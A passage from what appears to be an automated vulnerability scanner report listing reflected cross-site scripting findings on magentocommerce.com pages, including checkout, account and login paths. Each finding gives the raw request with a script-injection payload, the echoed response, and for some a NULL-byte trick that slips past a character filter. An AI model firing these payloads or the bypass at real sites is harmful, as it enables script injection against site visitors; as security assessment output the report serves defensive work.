Set-Cookie: exp_last_activity=1313176311; expires=Sat, 11-Aug-2012 15:11:51 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:51 GMT
Content-Length: 33490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view">
...[SNIP]...

1.42. http://www.magentocommerce.com/media/screencasts/upsells/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073488"><script>alert(1)</script>a85e9f53621 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73488"><script>alert(1)</script>a85e9f53621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176275; expires=Sat, 11-Aug-2012 15:11:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:15 GMT
Content-Length: 33220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1">
...[SNIP]...

1.43. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2691"><script>alert(1)</script>76ef6f1716c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view">
...[SNIP]...

1.44. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074a5c"><script>alert(1)</script>763ed951bbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74a5c"><script>alert(1)</script>763ed951bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176176; expires=Sat, 11-Aug-2012 15:09:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:36 GMT
Content-Length: 40888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1">
...[SNIP]...

1.45. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43075"><script>alert(1)</script>5dc7f68ca25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:55 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/" />
...[SNIP]...

1.46. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a1db"><script>alert(1)</script>dbe4e525590 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:56 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/" />
...[SNIP]...

1.47. http://www.magentocommerce.com/products/checkout/cart/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b941"><script>alert(1)</script>9ebe58ff066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:01 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Content-Length: 23073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1" />
...[SNIP]...

1.48. http://www.magentocommerce.com/products/customer/account/create/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/create/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74218"><script>alert(1)</script>f69b9c107fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:38 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/" />
...[SNIP]...

1.49. http://www.magentocommerce.com/products/customer/account/forgotpassword/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/forgotpassword/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75651"><script>alert(1)</script>5f880c0eeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:34 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/" />
...[SNIP]...

1.50. http://www.magentocommerce.com/products/customer/account/loginPost/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/loginPost/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c50"><script>alert(1)</script>6a963e07cd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:45 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/" />
...[SNIP]...

1.51. http://www.magentocommerce.com/products/ee/sso/logout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/ee/sso/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4277a"><script>alert(1)</script>af34fe383a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout" />
...[SNIP]...

1.52. http://www.magentocommerce.com/products/job-post.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02fa"><script>alert(1)</script>f908b06c15f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:04 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f" />
...[SNIP]...

1.53. http://www.magentocommerce.com/products/job-post.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18915"><script>alert(1)</script>8cadda0bb16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:23 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Content-Length: 31497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
